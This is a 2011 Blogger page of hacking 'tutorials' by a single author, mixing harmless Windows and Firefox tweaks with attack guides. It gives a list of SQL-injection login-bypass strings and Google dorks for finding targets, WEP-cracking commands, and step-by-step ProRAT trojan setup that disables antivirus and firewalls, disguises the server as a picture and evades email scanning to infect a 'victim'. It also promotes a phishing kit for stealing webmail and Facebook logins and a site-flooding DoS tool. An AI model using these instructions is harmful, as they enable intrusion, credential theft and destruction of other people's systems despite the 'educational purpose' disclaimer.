Powered By Blogger

Tuesday, May 31, 2011

Step By Step Tutorials on Data Recovery - How to Recover Data

We will discuss about how to recover data if it get deleted by accident or by will….

This step by step Tutorial will help you to recover data from crashed system. Some time we accidentally delete important files. Real disaster comes when you delete files from recycle bin also.

In this guide we will tell you how to recover data step by steps.

Caution:-
Do not try this process on your important data in first time. To avoid loose we will make an example partition and recover data from it.

Complete these perquisite first

  • Make a partition of 100 Mb and rename it with test
  • Make a folder named recover_data on C:\>
  • Put some useless data on it

Now delete all these data including recycle bin.
data recovery

Download and Extract this software

CLICK TO DOWNLOAD SOFTWARE


Run exe file by double clicking on it
exctracted data

On welcome screen Click Next
data recovery software

On license agreement Select I accept license agreement

Choose destination folder where you want to install this software

Click yes on warning message

On information screen click next

Now software will copy its necessary file on hard drive click on next

Once this process is done you will see this screen Click on finish

You have successfully installed necessary software now we will recover files those we have deleted earlier…


NOTE: THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLES.THIS ARTICLES IS FOR EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

JAI HIND......

FROM:KRUNAL UPADHYAY

How to remove XP - VISTA - Windows 7 - Server 2003 - Server 2008 Password........

We continue with our Tutorials, Yesterday or later we have studied about how to RECOVER PARTITIONS and DELETED FILES….now in continuation we would study about How to Remove Admin Password in any Operating System.

Firstly I’d ask a question from u…

How many times you have to reinstall window due to forget password of administrator or syskey? In lab scenario it’s very common. Consider a situation where students form one batch was doing the practical on Server. They have setadministrator password in all system and left the lab after the practical without telling you the password of Syskey and administrator. What will you do now? Format all systems No. we are telling you the way to reset the password and Syskey on window again.

For demonstration purpose we are setting Syskey and administrator password on one computer.

To set Syskey password

Open window and click on start button and go to run options

Type Syskey in run menu and press enter. This will invoke new windows.
set syskey password

Now click on update button and set the desired passwords.
set syskey password

Click on apply and ok.
set syskey password

Remove Syskey and administrator passwords form XP VISTA Server 2003 and Server 2008.

  • Download this software
  • Extract this winrar files. It’s a image file.
  • You can write this image with any image burning software. We are using our traditional software Nero.
  • Now go to the system and boot form this CD.

Press Enter on boot options.

remove syskey and administrator password

This window bootable Linux scripts will search your entire hard disk and show all the available partitions on hard disk.

remove syskey and administrator password

Select your windows partitions.

Now it will locate windows registry and sam files paths.

remove syskey and administrator password

Press enter to accept the default value.

Now you four options to do

  • To reset windows user passwords press 1
  • To reset Syskey press 2
  • To use recovery console to repair windows press 3
  • To reset registry press 9
  • To quit for selection windows press q

We will first reset Syskey so press 2 and enter.

remove syskey and administrator password

Scripts will confirm to disable Syskey. Press y and enter to confirm.

remove syskey and administrator password

Now we will reset windows administrator password.

To reset administrator password press 1 and enter.

remove syskey and administrator password

Select the user to whom password you want to reset. In our example we are resetting user Vinita’s password.

remove syskey and administrator password

Now press 1 and enter to clear the user password.

remove syskey and administrator password

Press ! sign and enter to come back on pervious menu.

remove syskey and administrator password

Press q to quit form menu.

Whatever change you have made till now will not save by defaults. To save these change scripts will drop in step4.

remove syskey and administrator password

Press y and enter to save the change you have made so far.

Now press ALT + CTRL + DEL to restart the system.

Hope this works for You as it did for me.


NOTE: THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLES.THIS ARTICLES IS FOR EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

JAI HIND......

FROM:KRUNAL UPADHYAY

Disable "This program Might not have installed correctly" in windows 7.......

Do you often see this dialog that says “This Program Might Not Have Installed Correctly, after you finish installing a new software on your computer?

win7-xp

win7-xp

and don’t know much about computers at all, then you should probably leave it enabled.

But if you know that the software you installed, actually IS working, and Windows 7 still gives you this message, then I’m sure it gets pretty annoying. That’s why you should definitely disable it.

Here’s another reason to consider. Windows 7 displays this message even if program is installed correctly and it works 100%. This is why the sentence “This Program Might Not Have Installed Correctly” has a word “might” in it.

This is how it looks:

Now let’s see how to disable it and finally stop the annoyance.

This message pops out because “Program Compatibility Assistant” process runs in the background. In fact, this service starts right at the system startup, so it’s even slowing down the System’s startup time a little bit.

Follow these steps to disable it:

1. Click the Start button on your taskbar.

2. In the search box, type “services.msc” (no quotations) and hit Enter.

3. When new window opens, find “Program Compatibility Assistance Service” in the list (see image below).

4. Right click on it, and then click “Stop” (image above)

Now we have finished the first part. We stopped it from running in the background. But if we restart computer, it will automatically run with startup again (remember?) and will continue to show you that message. To stop it from running with the system startup, we will do just a couple of additional steps.

5. Once the service is stopped, right-click on it again. Now go to “Properties”. In a new window, find the option “Startup Type“, and on drop-down menu of it, select “Disabled” and click OK. (image below)

Now you just need to restart your computer.

To confirm that you did everything right, open Task Manager (Ctrl+Shift+Esc) and look for “PcaSvc” in Services tab. If you don’t find it… Congratulations the service has been disabled

NOTE: THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLES.THIS ARTICLES IS FOR EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

JAI HIND......

FROM:KRUNAL UPADHYAY

HACK WEBSITE USING SQL Injection......

Q: What is sql injection?

A injecting sql queries into another database or

using queries to get authentication bypass as an admin.

Part 1 : Basic sql injection

Gaining authentication bypass on an admin account.Most sites vulnerable to this are .asp,So first we need 2 find a site, start by opening Google.Now we type our dork: “definition of dork” ‘a search entry for a certain type of site/exploit ”

There is a large number of google dork for basic sql injection.


here is the best:
“inurl:admin.asp”
“inurl:login/admin.asp”
“inurl:admin/login.asp”
“inurl:adminlogin.asp”
“inurl:adminhome.asp”
“inurl:admin_login.asp”
“inurl:administratorlogin.asp”
“inurl:login/administrator.asp”
“inurl:administrator_login.asp”

Now what to do once we get to our site.
the site should look something like this :

Welcome to xxxxxxxxxx administrator panel
Username :
Password:

So what we do here is in the username we always type “Admin
and for our password we type are sql injection.

Here is a list of sql injections..

‘ or ’1′=’1
‘ or ‘x’=’x
‘ or 0=0 –
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’=’x
” or “x”=”x
‘) or (‘x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’=’a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
‘or’1=1′

TYPE ANY ONE OF THESE IN PASSWORD SPACE…
There are many more but these are the best ones that i know of
and what this sql injection is doing : confusing the database till it gives you authentication bypass.
So your input should look like this

username:Admin
password:’or’1′=’1

So click submit and you’r in
NOTE not all sites are vulnerable.

HOW TO SECURE YOUR SITE FROM THIS ATTACK-

1- Put encryption on the passwords.

2- Change the platform
of your website from asp to php.

NOTE- this tutorial is totally for educational purpose only, for any kind of illegal result owner of this website is not responsible.

NOTE: THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLES.THIS ARTICLES IS FOR EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

JAI HIND......

FROM:KRUNAL UPADHYAY

Hack a WiFi network Using Backtrack tool..

Now I’ll tell you how to Hack a WiFi network Using Backtrack tool..

Steps To Follow:

1. Boot Live CD/DVD of BackTrack 4. After it boots, type in “startx” to start GUI
2. Open new Konsole (backtrack’s terminal).

3. Type, not using qoutes, “airodump-ng wlan0″. Now find the network you want to attack. Copy the BSSID and the channel (write down on piece of paper and keep handy)

4. Open new Konsole, type “airodump-ng -w wep -c 11 –bssid 00:24:b2:80:d7:3c wlan0″ **X & 00:24:b2:80:d7:3c are examples of the channel and bssid you should have copied**

5. You are now fixed on to the network you want to attack.

6. Close the first Konsole, open a new Konsole and type “aireplay-ng -1 0 -a 00:24:b2:80:d7:3c wlan0″ **00:24:b2:80:d7:3c is an example as well**

7. Open another new Konsole, type “aireplay-ng -3 -b 00:24:b2:80:d7:3c wlan0″ **00:24:b2:80:d7:3c example”

8. Go to first Konsole, wait for the Data to reach to 30,000; go to 3rd Konsole, hit CNTL + C, then type in “dir”, hit enter

9. Type “airecrack-ng wep.01.cap”, hit enter.

10. Let it run its course, should only take a few moments. Once key is found, it will show up with semi-colons in it. Take out the semi-colons, and this will be the key. (Example of key; 53:06:66:51:50, so it will be 5306665150)

NOTE: THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLES.THIS ARTICLES IS FOR EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

JAI HIND......

FROM:KRUNAL UPADHYAY

Windows Password Recovery Software 3.1.0.8 description

Data Doctor Password unmask unhide program is a useful free utility to reveal passwords hidden behind the asterisk ***** characters inside any protected password text box. It is a free utility tool and you do not need to buy any hacking software or any expensive password cracking utility to crack reset recover break or restore your forgotten password. If you have a password saved in memory and you forgot what it is, Software reveals MS Windows 98 NT ME 2000 XP 2003 passwords hidden with asterisks in password fields. Utility recover coded (*) passwords in password dialog boxes, web pages and ActiveX controls When user logins and passwords for all e-mail and newsgroups accounts stored by Outlook Express, Internet Explorer, Netscape or Opera web browser google gmail yahoo msn aol rediff indiatimes hotmail websites. Stealth E-mail Password Log key typed into the keyboard. Software like FTP Clients CuteFTP FlashFXP SmartFTP saves keystrokes can reveal by the tool. Professional Windows password breakers crackers or other related commercial password recovery services cost in thousands of dollars to reveal encrypted login security stored in password area. Data Doctor Password Unmask is a free safe and non destructive utility. Just drag mouse pointer to the asterisk ***** password and view store password. There is no illegal password hacking technique involved, it only reads or uncovers hidden password character that are covered by asterisks. Complete SOURCE CODE of Data Doctor Password Unmask software program is available for educational purpose. Features: * Password Recovery software reset Windows 98 ME NT 2000 XP 2003 administrator password reveal lost or forgotten Microsoft Office XP Office 2003 Word Excel Power Point Access Outlook, VBA project Password. * Software reveal email account password by only dragging the mouse over password field. * Software retrieve archives ZIP WINZIP RAR ARJ ACE PDF files password.

Follow the link and get free download Windows Password Recovery Software now.

NOTE: THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLES.THIS ARTICLES IS FOR EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

JAI HIND......

FROM:KRUNAL UPADHYAY

proRAT- Download the most Deadly Remote Administration Tools....

Hello friend’s…You must Have Used or Studied About many different type of Hacking Softwares or tools…But Today We will Understand the usability and Functioning one Killer Software named PRORAT…Its the Most Deadly REMOTE ADMINISTRATION TOOL….That can be used to hack any system Remotly….

HOW TO USE:

STEP-1 – Download the ProRat zip setup from the following link –> DOWNLOAD

STEP-2: Creating the ProRat server. Click on the “Create” button in the bottom. Choose “Create ProRat Server”.

STEP-3: Open Notifications. Select second option “Mail Notification”. In the E-MAIL field you will see a mail

id: bomberman@yahoo.com. Remove this mail ID and give your own mail id here. You will receive a notification

email on this email id whenever you victim will be connected to internet from the infected system.

STEP-4: Open General settings. This tab is the most important tab. In the check boxes. here is a quick overview

of what they mean and which should be checked.

Key:

[ ] = dont check
[x] = check

[ ] Give a Fake Error Message. (when they open the file, it gives an error message.
[x] Melt server on install. (this will cause the server to ALWAYS connect to the internet when the victim gets

online)
[x] Kill AV – FW on Install. (this causes the anti-virus and firewalls to SHUT DOWN and stay off once installed

on the victim’s computer.
[x] Disable Windows XP SP2 security center
[x] Disable Windows XP Firewall
[x] Clear Windows XP Restore Points
[ ] Dont send LAN notifications ( keeps other computers on the victim’s network from knowing about you )
[ ] Protection for removing local server

In the Invisibility Box, check all 4 boxes.

STEP-5: Open Bind With File. You can bind your server\downloader server with a file that you want. You must

click on the ”Bind the server with a file” button and then the file button will be activated. You can choose

a file to be binded with the server now. A good suggestion is a picture because that is a small file and its

easer to send to the people you need.

STEP-6: Open Server Extensions. I prefer using .exe files, because it is cryptable. Mostly crypters don’t

support .bat/.pif/.com etc. So use .exe files.

STEP-7: Open Server Icon. You can select the one you want to use with the server from the small pictures on the
menu. You can use an icon from your computer also. Press the “Choose new icon” button.

STEP-8: After this, press “Create server”, your server will be in the same folder as ProRat. A new file with

name “binded_server” will be created. Rename this file to something describing the picture.

[NOTE: PLS DO NOT OPEN THE FILE "binded_server" on your system.]

STEP-9: Sending this file “binded_server” to victim. You can send this trojan server via email, pendrive or if

you have physical access to the system, go and run the file.


From EMAIL, you can not send this file as it is because it will be detected as TROJAN OR VIRUS. Password protect this file with
ZIP and then email it. Once your victime download this ZIP file, ask him to unlock it using ZIP password. When
the victim will double click on the file, he will be in your control.

STEP-10: Connecting to the victim’s computer. Once the server has been sent and the person has opened this ZIP

folder, they will now be infected with it. AND HAVE NO CLUE ABOUT IT!. On the top of the ProRat program you

will see a box in the upper left corner. Type in the victim’s IP address and make sure the port is 5110. Now

press Connect. You should now see a pop-up box wanting to know a password. Remember the password you entered

while creating the server? that is what you need to type. By default, it is “123456″ without quotes.

STEP-11: Check your email, (junk in needed), and find the “Your victim is online”. Copy and paste the IP

address onto ProRat where it says “IP:[127.0.0.1]“. Press CONNECT, DO NOT CHANGE THE PORT, if u did change it

back to 5110. Type in the password (default is usually 123456, it is in the email). Your done, now you can mess

with the buttons on the program. Especially the GIVE DAMAGE button. It will damage their pc by format, and will

make the computer useless.

NOTE: THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLES.THIS ARTICLES IS FOR EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

JAI HIND......

FROM:KRUNAL UPADHYAY

Download login Spoofer@Gmail, Yahoo, Facebook, Live, hotmail password hacking........


LOGIN SPOOFER is a Software that it can create Professional Phishing Pages Like: (Hotmail, Yahoo, Gmail, GameZer, Facebook and many more ….) to Steal somebody’s Account you have to push him to login in one of your fake pages, when the Victim Login as you told him, His account (Username/Password) will register in our database So you go to the software (Login spoofer) and press refresh then you’ll find His Username & Password & IP & his OS Info…etc. Using and Downloading is free 100%.

  • Yahoo Password Hacking: Hack Yahoo Account Password with phishing attack.

  • Hotmail Password Hacking: Hack Hotmail Account Password with phishing attack.

  • Gmail Password Hacking: Hack Gmail Account Password with phishing attack.

  • GameZer Password Hacking: Hack GameZer Account Password with phishing attack.

  • Facebook Password Hacking: Hack Facebook Account Password with phishing attack..& many more..!!

DOWNLOAD LINK BELOW:

DOWNLOAD HERE

FEEL FREE TO COMMENT AND SHARE…STAY CONNECTED….


NOTE: THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLES.THIS ARTICLES IS FOR EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

JAI HIND......

FROM:KRUNAL UPADHYAY

4 websites to send anonymous SMS without Registration.....

There are a lot of websites on the Internet that provides free sms services but only handful of them allows you to send Sms without registration and anonymously. In this post I will review the services of 4 sms websites that allows you to send Anonymous messages.

1. Smsti.in

Smsti.in allows you send message of complete 160 words and without any ads. There message service is very fast and you can even check the delivery reports of the sms that has been sent.

They provide their sms services for Indian Mobile numbers only.

2. Seasms.com

Seasms allows you to send messages all over the world. This is the only free sms service that I found which all allows you to send worldwide messages anonymously.

They also provide 160 character support for SMS.

3. Spicesms.com

Spicesms allows you to send sms only in India with 130 character support for sms. Their service is very fast and sms are delivered instantaneously.

4. Bollywoodmotion

Bollywoodmotion is one of the best sms website as you can send sms up to 500 characters long.

They do not include any ads into your message and messages are delivered in real time.This service is available only for Indian mobile numbers

If you know any other sms services that allows you to send messages without registration then do share with us by commenting.

NOTE: Don’t send abusive messages to somebody using the above site as you can be traced.

NOTE: THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLES.THIS ARTICLES IS FOR EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

JAI HIND......

FROM:KRUNAL UPADHYAY

Sunday, May 29, 2011

Check your Security against DDos | How to protect | Hacking Protectionfrom DDos Attack

Now,In the Current tutorial I’ll tell how you can check security of your site against DDoS attack..
For this you’ll require the Following tools:
Hacking Tools Required:
1)Port Scanner
2)rdos
(click to download )
Steps to proceed:
Step One:
First you’ll need the IP address of your site.That is very easy to find out.You can check it on Who.is lookup..
link- http://www.who.is/
just type the URL of your site,It will show you complete information about your site along with it’s IP address.
as shown in the screenshot below:

whois lookup
step two:
Now,you have to know that Port 80 is open or not.
This is very easy todo to Ok open up the port scanner you downloaded.
Once in the port scanner type in your Victims ip that you got from step 1.
It will ask you to do a range scan or a full scan (SELECT REANGE SCAN!) It will ask for conformaition you have to use a capital Y or a capital N! Now enter 79 for lowest port and 81 for highest hit enter than hit cap Y.
[X] = Closed
[X] Vulnerable = Open
EXAMPLE:

check for port 80


Step Three:
The final and easiest step (IF PORT 80 IS CLOSED PICK A NEW SITE!)
If port 80 is open your on your way to crashing!!
Ok open Up rDos that you download.
Enter the ip that we got from step 1.
It will ask you for the port to attack use port 80 that is why we scaned to make sure 80 was open! If it is closed it will not work.
Hit enter.. *=Flooding -=Crashed Or didn’t connect!
EXAMPLE:

The site won’t be directly offline!!
it starts with ***********
be patiend.. after some time it will go like this: **********———–
that means the site crashed.


NOTE: THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLES.THIS ARTICLES IS FOR EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

JAI HIND......

FROM:KRUNAL UPADHYAY

3 Hacks for firefox That will Double Your Internet Browsing Speed

To improve performance when navigating (studies show that 39% of all page navigations are renavigations to pages visited less than 10 pages ago, usually using the back button), Firefox implements a Back-Forward cache that retains the rendered document for the last five session history entries for each tab.

This is a lot of data. If you have a lot of tabs, Firefox’s RAM memory usage can climb dramatically. It’s a trade-off. What you get out of it is faster performance as you navigate the web.

Now a lot of us have found the ’secrets’ on how to manipulate settings in “about:config” to drop the memory usage as long as possible and to increase the speed at which Firefox loads sites. Read on to find out how to do this.

Remember: Firefox (download it here) is the best internet browser available (in my opinion), and these tweaks below will make it even greater and faster. So enjoy!

Reduce the amount of RAM Firefox uses for it’s cache feature

Here’s how to do it:
1. Type “about:config” (no quotes) in the adress bar in the browser.
2. Find “browser.sessionhistory.max_total_viewer
3. Set it’s value to “0“;(Zero)

Increase the Speed in Which Firefox loads pages

1. Type “about:config” into the address bar and hit Enter.
(Normally the browser will make one request to a web page at a time. When you enablepipelining it will make several at once, which really speeds up page loading.)

2. Alter the entries as follows:

Set “network.http.pipelining” to “true
Set “network.http.proxy.pipelining” to “true
Set “network.http.pipelining.maxrequests” to some number like 10.

This means it will make 10 requests at once.

3. Lastly, right-click anywhere and select New-> Integer. Name it “nglayout.initialpaint.delay” and set its value to “0“;.(Zero)

This value is the amount of time the browser waits before it acts on information it receives. If you’re using a broadband connection you’ll load pages faster now.
Optionally (for even faster web browsing) here are some more options for your about:config(you might have to create some of these entries by Right Click –> New– > Interger or String

network.dns.disableIPv6: set “false”
content.notify.backoffcount”: set “5“; (Five)
plugin.expose_full_path”: set “true”.
ui.submenuDelay”: set “0; (zero)

Reduce RAM usage to 10mb when Firefox is minimized:

This little hack will drop Firefox’s RAM usage down to 10 Mb when minimized:

1. Open Firefox and go to the Address Bar. Type in about:config and then press Enter.
2. Right Click in the page and select New -> Boolean.
3. In the box that pops up enter “config.trim_on_minimize”. Press Enter.
4. Now select True and then press Enter.
5. Restart Firefox.

These simple tweaks will make your web browsing with Mozilla Firefox 2-3 times faster and easier. And I think they are fairly easy to apply. Enjoy!


NOTE: THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLES.THIS ARTICLES IS FOR EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

JAI HIND......

FROM:KRUNAL UPADHYAY

Saturday, May 28, 2011

How to Delete Windows Undeletable Files

We all face this problem in windows that we cant delete some files in windows and they never get deleted. This is because of the files getting connect to the other windows explorer and they waste system resources. To this these types of undeletable files i have a trick. Lets see



1) Open Windows + R to open Run and type cmd to open the Command Prompt.
2) Now Windows + R to open Run and type taskmgr.exe or right click on taskbar to open taskmanager.
3) In the Task Manager window click on the Processes tab.
4) From the processes list highlight explorer.exe and then click the End Process button.
5) Don’t close the Task Manager window, keep it open along with the Command Prompt.
6) Now return to Command Prompt and change the directory to the directory that contains the file which you want to delete.
7) In Command Prompt type: del (filename) (where the (filename) is the name of the file you want to delete).
8)

Press Enter to Delete the file. Thats all.



If you don’t want all these steps to be done just install a application called UNLOCKER.EXE and delete the file by right clicking on it and selecting unlockerand then select delete.



DOWNLOAD UNLOCKER 1.8.9

NOTE: THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLES.THIS ARTICLES IS FOR EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

JAI HIND......

FROM:KRUNAL UPADHYAY

Hide all drives from My Computer

How to Hide the drives(c:,d:,e:,…etc) in Ur Computer

This is a great trick you can play on your friends. To disable the display of local or networked drives when you click My Computer

  1. Go to Start -> Run.
  2. Type regedit
  3. Now go to: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
  4. Now in the right pane, create a new DWORD item and name it NoDrives (it is case sensitive).
  5. Now modify it’s value and set it to 3FFFFFF (Hexadecimal) .
  6. Now restart your computer.
  7. So, now when you click on My Computer, no drives will be shown(all gone…).


To enable display of drives in My Computer, simply delete this DWORD item that you created. Again restart your computer. You can now see all the drives again. Magic…….


NOTE: THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLES.THIS ARTICLES IS FOR EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

JAI HIND......

FROM:KRUNAL UPADHYAY

Chat with Friends through ms dos Command Prompt

1) All you need is your friend’s IP Address and your Command Prompt.

2) Open Notepad and write this code as it is…..!
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A


3) Now save this as “Messenger.Bat”.

4) Open Command Prompt.

5) Drag this file (.bat file) over to Command Prompt and press Enter.

6) You would then see something like this:



7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:




8) Now all you need to do is type your message and press Enter.
Start Chatting…….!


NOTE: THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLES.THIS ARTICLES IS FOR EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

JAI HIND......

FROM:KRUNAL UPADHYAY

How To Find The Real IP Address Of Your Windows Computer

As i have observed from many people that they think that there computer IP address and Internet IP are Same.But the Fact is that they are both different.If you are on a Home Network or a Work Network and using a switch then your computer NIC is assigned to local IP address.

When you access internet from your computer behind a switch and chek your IP address at http://www.tracemyip.com you will get a IP address which is the address of the router(provided by your ISP) but not your computer address.

The Original IP address of your computer can be found only when you connect directly to your computer without any switches or etc. As we all the know the differences between IP address and a computer IP now lets us see how we ca find the IP address of a computer.
We can find the IP address in three ways:

1) From Command Prompt:
Open your command prompt using Win + R and type cmd and press Enter. Now type ipconfig in the command prompt

If your computer has more than one NIC adapter we can we all the IP address of the NIC’s using ipconfig command as done earlier.

Now type ipconfig/all in the command prompt which will show all the network adapter settings. Now you can see the IP address information of connected Nic’s. I am not showing you the screenshot because of Hacking Threats.

2) From Windows GUI

If you feel uncomfortable with Command prompt you can see the IP address through GUI. To see in a easy way type ncpa.cpl in the Run (win + r). Right click on the Lan icon and select status.
Now press the support tab and click on the details button.
Now you can see the IP address assigned to NIC.


3) SIW Utility


Just Download SIW which doesn’t require any installation. Just Unzip it. Now double click on siw.exe and navigate to Hardware section and click on Network adapters. Here you can see all the network adapters installed on your computers. To find the active NIC, look at the status field whether connected or not.Just below that you can view the assigned Ip address.


Now Remember one thing that computers dont have IP address but NIC will. And its possible to have more than IP address assigned for use with your computer.


Note: For more IP address details u can search from the site ip-details.com. If you enter your domain name, it will show your IP address along with the route map. It is very useful to get IP details in free of cost.

NOTE: THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE DONE USING INFORMATION IN THIS ARTICLES.THIS ARTICLES IS FOR EDUCATIONAL PURPOSE ONLY. SHARE YOUR CYBER KNOWLEDGE FOR HUMANITY.FIGHT AGAINST CYBER TERRORISM.

JAI HIND......

FROM:KRUNAL UPADHYAY